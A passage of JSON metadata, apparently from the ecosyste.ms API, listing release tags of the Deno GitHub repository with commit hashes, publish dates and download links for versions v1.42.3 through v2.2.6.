g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4